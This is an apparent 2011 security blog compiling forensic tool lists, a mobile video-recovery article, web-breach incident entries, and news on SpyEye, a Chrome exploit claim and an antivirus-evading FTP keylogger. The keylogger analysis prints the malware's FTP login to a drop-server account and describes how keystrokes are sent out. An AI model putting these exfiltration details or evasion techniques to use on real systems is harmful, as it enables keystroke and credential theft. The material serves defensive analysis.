Tuesday, May 31, 2011


CrossPost from Windows Incident Response blog:

Keydet89 has listed a number of forensic and IR and RE tools.

Memory Analysis
There have been a number of changes recently on the memory analysis front.  For example, Mandiant recently released their RedLine tool, and HBGary released the Community Edition of their Responder product. 

While on the topic of memory analysis tools, let's not forget the erstwhile and formidable Volatility.

Also, if you're performing memory dumps from live systems, be sure to take a look at the MoonSol Windows Memory Toolkit.

SQLite Tools
CCL-Forensics has a trial version of epilog available download, for working with SQLite databases (found on smartphones, etc.).  One of the most noticeable benefits of epilog is that it allows you to recover deleted records, which can be very beneficial for analysts and investigators.

I'm familiar with the SQLite Database Browser...epilog would be interesting to try.

MFT Tools
Sometimes you need a tool to parse the NTFS $MFT file, for a variety of reasons.  A version of my own mft.pl is available online, and Dave Kovar provided his analyzemft.pl tool online, as well.  Mark McKinnon has chimed in and provided MFT parsing tools for Windows, Linux, and MacOSX.

Other Tools
HBGary also made their AcroScrub tool available, which uses WMI to reach across the enterprise and scan for older versions of Adobe Reader.

A very interesting tool that I ran across is Flash Dissector.  If you deal with or even run across SWF files, you might want to take a look at this tool, as well as the companion tools in the SWFRETools set.

The read_open_xml.pl Perl script is still available for parsing metadata from Office 2007 documents.

From the same site as the SWFRETools are some malware write-ups including NiteAim, and Downloader-IstBar.  As a complete aside, here's a very interesting Gh0stNet writeup that Chris pointed me to recently (fans of Ron White refer to him as 'Tater Salad'...fans of Chris Pogue should refer to him as 'Beefcake' or 'Bread Puddin''...).

Alternate data streams isn't something that you see discussed much these days.  I recently received a question about a specific ADS, and thought I'd include some tools in this list.  I've used Frank's LADS, as well as Mark's streams.exe.  Scanning for ADSs is part of my malware detection process checklist, particularly when the goal of the analysis is to determine if there's any malware on the system.

Also, I ran across this listing at MS of Known Alternate Stream Names.  This is some very useful information when processing the output of the above tools, because what often happens is that someone uses one of the above tools and finds one of the listed ADSs, and after the panic that ensues, their attitude switches back to the other side of the spectrum, to apathy...and that's when they're most likely to get hit.

Here are some additional resources from Symantec, IronGeek, and MS. Also, be sure to check out what I've written about these in WFA 2/e.


Microsoft recently released their Safety Scanner, which is a one-shot micro-scanner...download it, run it, and it expires after 10 days, and then you have to download it again.  This shouldn't replace the use of Security Essentials or other AV tools, but I'm pointing this out because it could be very useful when included as part of your malware detection process.  For example, you could mount an acquired image via FTK Imager or ImDisk and scan the image.  Also, the folks at ForensicArtifacts recently posted on accessing VSCs (their first research link actually goes back to my post by the same title...thanks to AntiForensics for reposting the entire thing...)...without having to have EnCase or PDE, you could easily scan the mounted VSC, as well.

The Digital Forensics Framework (DFF) is open source, and was recently updated to include support for the AFF format, as well as mailbox reconstruction via Joachim Metz's libpff.

Christopher Brown, of TechPathways, has made ProDiscover Basic Edition v6.10.0.2 available, as well.  As a side note, Chris recently tweeted that he's just finished the beta of the full version of ProDiscover, adding the ability to image and diff VSCs.  Wowzers!

TZWorks - free "prototypes" tools, including the Windows Shellbags parser, an EVTX file parser, and others.  Definitely worth checking out.

WoanWare - several free forensics tools including a couple for browser forensics, and (like TZWorks) a 'USBStor parser'.

NirSoft - the link to the site goes to the forensics tools, but there are a lot of free tools available at the NirSoft site...too many to list.

The Open Source Digital Forensics site is a good source of tools, as well.

Speaking of tools, let's not forget that the OSDFC is right around the corner...

Check out Phil Harvey's EXIFTool (comes with a standalone Windows EXE)...there's a long list of supported file types at the tool page.

Additional lists of tools include Mike's Forensic Tools, as well as the tools at MiTeC (thanks to Anonymous' comment).  Also, Mark McKinnon has posted some freely available tools, as well.

Salvaging Digital Video Fragments

Salvaging Digital Video Fragments: "

Digital video is becoming a more common form of digital evidence with the increasing prevalence of video in computers, mobile devices and cameras. Digital cameras can create high quality videos, most smart phones can create videos, and the iPad2 has two cameras that can create videos. The videos created by such digital devices can be stored on removable storage media and on the devices themselves. Frequent creation and deletion of videos on these kinds of devices can result in fragments of deleted video clips that most file carving tools cannot salvage. In addition, when dealing with Flash memory dumps acquired from mobile devices, data at the physical level is often fragmented. Specialized methods and tools are needed to salvage deleted video fragments as demonstrated in this article using the contents of Flash memory acquired from a Motorola V3 (RAZR) mobile device.

File Carving Limitations

Most file carving tools require a known file header in order to salvage deleted data. For instance, to recover a deleted 3gp file, most carving tools look for the file headers such as the following.

Hex view of 3gp header in the Motorola V3 Flash memory dump

If the file is fragmented or the header is missing, the file carving approach will not salvage the deleted video successfully. In this example, a file carving tool that searched the Motorola V3 memory dump for several 3gp header signatures found two files in as shown in the audit log:

    05/24/2011, 11:26:35
    QuickTime 3GP (3gp), header: ftypisom
    QuickTime 3GP (3gp), header: ftyp3gp
    QuickTime 3GP (3gp), header: ftypmmp4
    Default file size: 1024 KB
    Maximum file size: 100 times (individual file type definition defaults sizes respected)

    E:\Physical GSM Motorola V3 RAZR\Flex Partition 1140000-1fe0000.bin
    Scope: 000000 - E9FFFF
    Extensive byte-level search

    9D0E80 - AD0E7F: 00001.3gp
    B888F0 - C888EF: 00002.3gp

    05/24/2011, 11:26:35
    2 file headers were found. 2 files were retrieved.

However, the salvaged files were invalid because the original files were fragmented. Furthermore, the names and directory paths of these files were not obtained using this method, demonstrating a further limitation of file carving.

Salvaging Video Fragments

When video files are fragmented, it is necessary to consider the video file format in more detail. Fortunately, many digital video formats have a structure that can be used to find and salvage individual frames. A frame is a discrete section of the video that can have a timecode or sequence number and other characteristics that can be useful for salvaging digital video clips.

The defraser tool can be used to identify frames for several video formats in a forensic duplicate of any piece of storage media, including a removable storage card, computer hard drive and Flash dump from a mobile device. The following screenshot shows defraser used to detect video related data in the Motorola V3 memory dump.

Defraser showing video related data in the Motorola V3 memory dump

Although the defraser tool does not automatically piece together the frames into a video that can be played, it does make the frames available for manual reconstruction. With some effort, defraser may be used to combine fragmented frames into a valid video file that can be played.

As with file carving methods that rely on header signatures, the carving methods employed by defraser do not provide the filenames and directory path of salvaged video data in the context of the original file system.

File System Reconstruction

Ultimately, the most effective approach to extracting digital video files from acquired digital evidence such as a Flash memory dump from mobile device is to reconstruct the logical arrangement of data. On mobile devices, this logical structure involves the flash abstraction layer and file system. Using mobile device forensic tools such as Cellebrite Physical and XRY, it is possible to reconstruct and review logical file structure of a Flash memory dump as shown below with a 3gp video stored in an MMS related file in the Motorola V3 memory dump. Note that different tools may interpret the logical structure differently and show more files and folders, clearly demonstrating the importance of validating the results of forensic examination tools.

XRY/XACT showing the logical file system in the Motorola V3 memory dump

Cellebrite Physical showing the logical file system in the Motorola V3 memory dump

Extracting the MMS file using such a mobile device forensic tool and extracting the video content as discussed in the “Delving into Mobile Device File Systems” blog post results in a 3gp file that can be played using VLC media player.

Playing salvaged digital video using VLC Player

Examination of Salvaged Video

After salvaging digital video files it is important to review the resulting data closely for potential anomalies. For instance, using MediaInfo to extract metadata from video files shows details related to its creation and format. The following screenshot shows metadata from a 3gp video extracted from the Motorola V3 memory dump, revealing that the embedded date-time stamp was set to an incorrect date.

Metadata within a 3gp video displayed using MediaInfo

In addition, reviewing individual frames within a salvaged video file can reveal anomalies such as portions of two unrelated videos being combined into one salvage file. The following screenshot shows frames extracted from a 3gp file using DCCI Video Validator revealing footage from two unrelated video files.

Frames extracted from digital video using DCCI Video Validator


When a video file is fragmented or the header of a video file is overwritten, carving methods that rely on header signatures and contiguous files will not salvage video files successfully and may even incorrectly combine unrelated video fragments into a single file or fail to detect the presence of video content altogether. However, using specialized tools such as defraser, a digital investigator may be able to salvage fragments of video files and piece them together into a valid video file. This process of reconstructing video fragments is time consuming and error prone, particularly when dealing with numerous video files on a single piece of storage media or mobile device. Therefore, whenever feasible, it is preferable to reconstruct the logical arrangement of data to extract the complete content of video files. Whichever method is most effective for salvaging digital video, it is important to examine the results closely to ensure the accuracy and completeness of the resulting videos. Such a review includes inspecting embedded metadata for anomalies and reviewing keyframes for possible fragments of unrelated video footage.



If you are serious about scrambling your internet traffic, SniffJoke is for you. It is a linux application that transparently modifies your TCP sessions, delaying, scrambling, injecting fake traffic, effectively making it impossible/very difficult for any one running a sniffer on your network, to figure out what is actually happening.

How Does It Work?

It works only under Linux (at the moment), creates a fake default gateway in your OS (the client or a default gateway) using a TUN interface check every traffic passing thru it, tracks every session and
applyies two concepts: the scramble and the hack.

The scramble is the technology to bring:

  1. A sniffer to accept as true a packet who will be discarded by the server , or
  2. A sniffer to drop a packet who will be accepted by the server.

The scramble technology brings in de-synchronization between the sniffer flow and the real flow.

The bogus packet accepted by the sniffer is generated by the “plugin” is a C++ simple class, which in a pseudo stateful  tracking will forge the packet to be injected inside the flow. is pretty easy to develop
anew one, and if someone wants to make research on sniffers attack (or fuzzing the flow searching for bugs) need to make the hand inside its.

The configuration permits to define blacklist/whitelist ip address to scramble, a degree of aggressivity for each port, which plugin will be used.

You can download SniffJoke here:


Saturday, May 21, 2011

Lock Down Your Computer Like the NSA

Lock Down Your Computer Like the NSA:

Want to secure your computer with the same techniques used by the National Security Agency? Turns out the NSA has published guides for securing Windows, Mac, Linux, and Solaris operating systems using methods that 'are currently being used throughout the government and by numerous entities as a security baseline for their systems.' More »

Friday, May 13, 2011

Tool Updated: Process Hacker

Process Hacker is a feature-packed tool for manipulating processes and services on your computer.

Key features of Process Hacker:
- A simple, customizable tree view with highlighting showing you the processes running on your computer.

- Detailed performance graphs.

- A complete list of services and full control over them (start, stop, pause, resume and delete).

- A list of network connections.

- Comprehensive information for all processes: full process performance history, thread listing and stacks with dbghelp symbols, token information, module and mapped file information, virtual memory map, environment variables, handles, ...

- Full control over all processes, even processes protected by rootkits or security software. Its kernel-mode driver has unique abilities which allows it to terminate, suspend and resume all processes and threads, including software like IceSword, avast! anti-virus, AVG Antivirus, COMODO Internet Security, etc. (just to name a few).

- Find hidden processes and terminate them. Process Hacker detects processes hidden by simple rootkits such as Hacker Defender and FU.

- Easy DLL injection and unloading - simply right-click a process and select "Inject DLL" to inject and right-click a module and select "Unload" to unload!

- Many more features...

Wednesday, May 11, 2011

Mac memory reader

Free Tools for Mac and IOS Forensics

Scalpel 2.0 is here with lots of new features

Scalpel file carver, version 2.0 - has the first public release in almost five years. There are a slew of performance enhancements and new features, focusing on improved carving accuracy and performance, and even more goodness is on the

Just some of the new features include:

  • Support for TRE-based regular expressions for headers and footers
  • Support for minimum carve sizes for recovered files
  • Parallel architecture to take full advantage of multicore processors
  • Beta support for NVIDIA CUDA-based GPU acceleration of header / footer searches
  • An asynchronous IO architecture for significantly faster IO throughput
  • Support for 32 and 64-bit Linux, Windows XP, Vista and 7, and OSX

In the coming weeks will post some ways to put these new features to
good use, as well as for the introduction of some even newer

The new version can be downloaded from:http://www.digitalforensicssolutions.com/Scalpel/
The download file contains pre-compiled Windows binaries as well as the project
source code.  If you find any bugs while using Scalpel please send an
email to scalpel at digitalforensicssolutions dot com. If you want to send
comments to the authors, you can  contact Golden Richard
(golden@cs.uno.edu / @nolaforensix ) or Lodovico Marziale ( vico@digdeeply.com / http://www.linkedin.com/in/lodovicomarziale ).
If you are interested in the GPU research that went into this project, read the published paper at DFRWS that discusses both the CUDA architecture as well as
the integration of it into Scalpel. It can be found here

Latest Web Hacking Incident Database (WHID) Entries

These are the lastest entries added by SpiderLabs to the Web Application Security Consortium (WASC) Web Hacking Incident Database (WHID) Project.

WHID 2011-84:Hackers access personal info of Lancaster County students

Entry Title: WHID 2011-84:Hackers access personal info of Lancaster County students
WHID ID: 2011-84
Date Occurred: April 20, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: South Carolina
Incident Description: LANCASTER, S.C. -- The Lancaster County School District says hackers may have stolen the personal information of 25,000 students in the district's database.
Schools officials are now trying to contact everyone who might have been affected. Information stored in the database goes back 10 years.
Mass Attack: No
Reference: http://www.wcnc.com/news/local/Personal-Information-of-Thousands-exposed-to-Internet-Hackers-120316064.html
Attack Source Geography:
Number of Records: 25,000

WHID 2011-83: Minn. man accused of hacking Facebook accounts

Entry Title: WHID 2011-83: Minn. man accused of hacking Facebook accounts
WHID ID: 2011-83
Date Occurred: April 21, 2011
Attack Method: Social Engineering
Application Weakness: Insufficient Password Recovery
Outcome: Account Takeover
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: Prosecutors have accused a Minnesota man of hacking into other people's Facebook and other computer accounts and stealing photos of women to post on adult websites.
Prosecutors charged Timothy Peter Noirjean, 26, of Woodbury, with 13 counts of identity theft, alleging that from February 2010 through March 2010 he contacted women online and duped them into providing him with personal information that allowed him to hack their Facebook and other accounts. After hacking a Facebook account, prosecutors say Noirjean would pose as the owner to make contact with that person's friends and try to gain access to more computer accounts.
Read more: http://www.foxnews.com/us/2011/04/20/minn-man-accused-hacking-facebook-accounts/#ixzz1KBSiqxBX
Mass Attack: No
Reference: http://www.foxnews.com/us/2011/04/20/minn-man-accused-hacking-facebook-accounts/
Attack Source Geography:
Attacked System Technology: Facebook

WHID 2011-82: Sony fears Anonymous hack as PSN stays down

Entry Title: WHID 2011-82: Sony fears Anonymous hack as PSN stays down
WHID ID: 2011-82
Date Occurred: April 21, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: It's looking more likely that loose-knit 'hacktivist' collective Anonymous may have pulled off the 'biggest ever' attack on Sony's PlayStation network (PSN), as company engineers are investigating the possibility that the online gaming service has been hacked.
Mass Attack: No
Reference: http://www.thinq.co.uk/2011/4/21/sony-fears-anonymous-hack-psn-stays-down/
Attack Source Geography:

WHID 2011-81: AlArabiya.net Hacked…Again

Entry Title: WHID 2011-81: AlArabiya.net Hacked…Again
WHID ID: 2011-81
Date Occurred: April 21, 2011
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: News
Attacked Entity Geography: Saudi Arabia
Incident Description: Being one of the region’s leading news agencies, Al-Arabiya which is part of MBC Group, the largest broadcasting company in the Middle East has been hacked by an unknown group signed only with ‘Crack_Man’ stating it has been ‘powered morocco’.
The hacked website comes in a long lasting tradition of security flaws in the website leading to the recurrent event of the portal being hacked during political instability hits the region usually as an expression of disagreeing with what many consider the news agency’s Western oriented liberal point of view.
Mass Attack: No
Reference: http://thenextweb.com/me/2011/04/21/alarabiya-net-hacked-again/
Attack Source Geography:

WHID 2011-80: Ashampoo server hacked, customer names and e-mail addresses stolen

Entry Title: WHID 2011-80: Ashampoo server hacked, customer names and e-mail addresses stolen
WHID ID: 2011-80
Date Occurred: April 21, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: Rolf Hilchner, CEO of Ashampoo, has posted on the company’s website explaining exactly what has happened. Apparently hackers managed to break into one of Ashampoo’s servers that held customer data. There was a hole in their security and by using it Ashampoo customer names and e-mail addresses have been taken, but no payment and billing information was accessed.
Mass Attack: No
Reference: http://www.geek.com/articles/geek-pick/ashampoo-server-hacked-customer-names-and-e-mail-addresses-stolen-20110421/
Attack Source Geography:
Additional Link: http://www.ashampoo.com/en/usd/dth

WHID 2011-79: Change.org Victim of DDoS Attack From China

Entry Title: WHID 2011-79: Change.org Victim of DDoS Attack From China
WHID ID: 2011-79
Date Occurred: April 19, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography:
Incident Description: Change.org, an online petitioning platform, has come under an ongoing distributed denial of service (DDoS) attack originating from China after the site hosted a call urging Chinese authorities to release artist Ai Weiwei from custody.
Mass Attack: No
Reference: http://www.pcworld.com/printable/article/id,225672/printable.html
Attack Source Geography: China

WHID 2011-78: The Children's Place, popular kid's clothing retailer, hit with database breach

Entry Title: WHID 2011-78: The Children's Place, popular kid's clothing retailer, hit with database breach
WHID ID: 2011-78
Date Occurred: April 19, 2011
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Phishing
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: The Children's Place Retail Stores Inc. said Tuesday that its customer email address database was recently accessed by an unauthorized third party. The database is stored at an external email service provider, according to company officials. The external service provider confirmed that only email addresses were accessed and no other personal information was obtained.
Mass Attack: No
Reference: http://www.csoonline.com/article/679983/the-children-s-place-popular-kid-s-clothing-retailer-hit-with-database-breach
Attack Source Geography:

WHID 2011-77: Scottish news site hit by 'DDoS attack' in run-up to elections

Entry Title: WHID 2011-77: Scottish news site hit by 'DDoS attack' in run-up to elections
WHID ID: 2011-77
Date Occurred: April 19, 2011
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Scotland
Incident Description: Politically-motivated hackers are thought to be behind a DDoS attack on alternative news site Newsnet Scotland, launched on Monday days before Scotland is due to vote in fiercely contested local elections.
The attack, if that's what it is, left the site unavailable from Monday afternoon into the early hours of Tuesday morning.
Mass Attack: No
Reference: http://www.theregister.co.uk/2011/04/19/scottish_news_site_ddos/
Attack Source Geography:

WHID 2011-76: Auto Trader website attacked

Entry Title: WHID 2011-76: Auto Trader website attacked
WHID ID: 2011-76
Date Occurred: April 19, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Automotive
Attacked Entity Geography: USA
Incident Description: According to a story released on the Auto Trader blog page, the Auto Trader website was subject to an attack from midday on Apil 19th until the early hours of April 20th.
The attack disrupted access to the sight, causing it to run slowly or not open at all. According to the blog the attack originated from abroad. Such attacks, called denial of service, or DDOS attacks, are desig
Mass Attack: No
Reference: http://www.honestjohn.co.uk/news/buying-and-selling/2011-04/auto-trader-website-attacked/
Attack Source Geography:

WHID 2011-75: Manila Water's website hacked

Entry Title: WHID 2011-75: Manila Water's website hacked
WHID ID: 2011-75
Date Occurred: April 17, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Energy
Attacked Entity Geography: Manila, Philippines
Incident Description: The website of water concessionaire Manila Water was hacked early Sunday, with visitors to the site seeing a small window indicating the breach.

WHID Analysis - looking at the html in the pages, it appears as though sql injection was the attack vector -

<script type="text/javascript">
function show_alert(){
alert("hacked! pakifix po yung blind sql po sa server nyo :D");}

Mass Attack: No
Reference: http://www.gmanews.tv/story/218014/nation/manila-waters-website-hacked
Attack Source Geography:

WHID 2011-74: Wind Power Company Hacked

Entry Title: WHID 2011-74: Wind Power Company Hacked
WHID ID: 2011-74
Date Occurred: April 18, 2011
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: SCADA
Attacked Entity Geography: New Mexico, USA
Incident Description: In an email interview with the IDG News Service, Bigr R, said he was a former employee of NextEra's parent company, Florida Power & Light. He said he used a bug in the Cisco Security Device Manager software used by NextEra to break into the site. "They gave to it public IP, so it was easy to hack into it through the Web," he said. "They used default passwords, which I got from one of administrators. Then I obtained level 15 priv. (superuser), and understood the topology of SCADA networks. Then it was easily to detect SCADA and turn it off."
Mass Attack: No
Reference: http://www.computerworld.com/s/article/9215881/Wind_power_company_sees_no_evidence_of_reported_hack
Attack Source Geography:

WHID 2011-73: Royal Navy hacker claims to have broken into space agency site

Entry Title: WHID 2011-73: Royal Navy hacker claims to have broken into space agency site
WHID ID: 2011-73
Date Occurred: April 18, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description: Login credentials for database, email and other key systems that a poster claims belong to the European Space Agency were posted on a full disclosure mailing list over the weekend.
Mass Attack: No
Reference: http://www.eweekeurope.co.uk/news/european-space-agency-confirms-ftp-server-hack-26976
Attack Source Geography:

SpyEye Targets Opera, Google Chrome Users

The latest version of the SpyEye trojan includes new capability specifically designed to steal sensitive data from Windows users surfing the Internet with the Google Chrome and Opera Web browsers.

The author of the SpyEye trojan formerly sold the crimeware-building kit on a number of online cybercrime forums, but has recently limited his showroom displays to a handful of highly vetted underground communities. KrebsOnSecurity.com recently chatted with a member of one of these communities who has purchased a new version of SpyEye. Screenshots from the package show that the latest rendition comes with the option for new “form grabbing” capabilities targeting Chrome and Opera users.

SpyEye component in version 1.3.34 shows form grabbing options for Chrome and Opera

Trojans like ZeuS and SpyEye have the built-in ability to keep logs of every keystroke a victim types on his or her keyboard, but this kind of tracking usually creates too much extraneous data for the attackers, who mainly are interested in financial information such as credit card numbers and online banking credentials. Form grabbers accomplish this by stripping out any data that victims enter in specific Web site form fields, snarfing and recording that data before it can be encrypted and sent to the Web site requesting the information.

Both SpyEye and ZeuS have had the capability to do form grabbing against Internet Explorer and Firefox for some time, but this is the first time I’ve seen any major banking trojans claim the ability to target Chrome and Opera users with this feature.

Aviv Raff, CTO and co-founder of security alert service Seculert, said that both SpyEye and ZeuS work by “hooking” the “dynamic link library” or DLL files used by IE and Firefox. However, Chrome and Opera appear to use different DLLs, Raff said.

This strikes me as an incremental yet noteworthy development. Many people feel more secure using browsers like Chrome and Opera because they believe the browsers’ smaller market share makes them less of a target for cyber crooks. This latest SpyEye innovation is a good reminder that computer crooks are constantly looking for new ways to better monetize the resources they’ve already stolen. Security-by-obscurity is no substitute for good security practices and common sense: If you’ve installed a program, update it regularly; if you didn’t go looking for a program, add-on or download, don’t install it; if you no longer need a program, remove it.

Tuesday, May 10, 2011

VUPEN pwns Chrome

VUPEN Security claims to have pawned Google Chrome and has released a video prporting that claim. This effects Chrome version 11.0.696.65 and Win7 SP1 64-bit. This code that VUPEN came up with, bypasses ASLR, DEP and Sandbox. It is also silent, in that the browser does not crash after executing the payload. VUPEN claims it works on all Windows systems (x86 and 64). Chrome has survived the PWN2OWN contest for the past 3 yrs in a row.

Security VUPEN style, means VUPEN does not disclose this vuln to Google. It however will provide it to its clients and customers, enabling them to protect themselves. This in effect means, that Google may not have any way of verifying these claims, anytime soon.

This exploit is similar in nature to other browser exploits, Dude is tricked into visiting a webpage hosting exploit; Exploit gets executed, and then executes other payloads, ulimately downloading a malicious app from a remote location and dude is 0wned. Only difference here is that the malicious code somehow manages to run at medium integrity level.Duh!!! what are integrity levels. Look here for more details on this subject.

Thursday, May 5, 2011

FTP Keylogger

Rob @ myownangle has posted this FTP keylogger that is not detected by any anti-virus at this time. Did someone say Anti-Virus is effective 40% of the time. Its 0% effective against any new threats. Signture based detection is DEAD.

At the time of writing this malware, 2a61033a34be3dbbf0a3dfefdae4423c, has not been detected by any of the antivirus engines used by VirusTotal, 0 antimalware software out of 42 (0.0%) did not detected the threat.

Anyway, this is a malware (keylogger) that uses an FTP server to send out information regarding the infected machine.
It creates a directory in the FTP server (the directory is named as you PC name) and then stores information about the key pressed by the users.
The malware creates differents configuration files (.sys extension - but their are textual files and not drivers) in C:\WINDOWS\System32\drivers. These files has been used as configuration files by the malware to send out information.
It uses an FTP server to send out a file named: WinKey-[YOURCOMPUTER_NAME].html (in the directory system32).

220 ProFTPD 1.3.3d Server (ProFTPD) []
USER win32@video.x10.bz
331 Password required for win32@video.x10.bz
230 User win32@video.x10.bz logged in
250 CWD command successful

The file WinKey-[COMPUTER_NAME] contains the key pressed by the users:

==[notepad.exe]::[Untitled - Notepad]::[18:01:40]==
[MAIUSC]this ...... etc etc etc etc ..... TEXT TEXT TEXT .....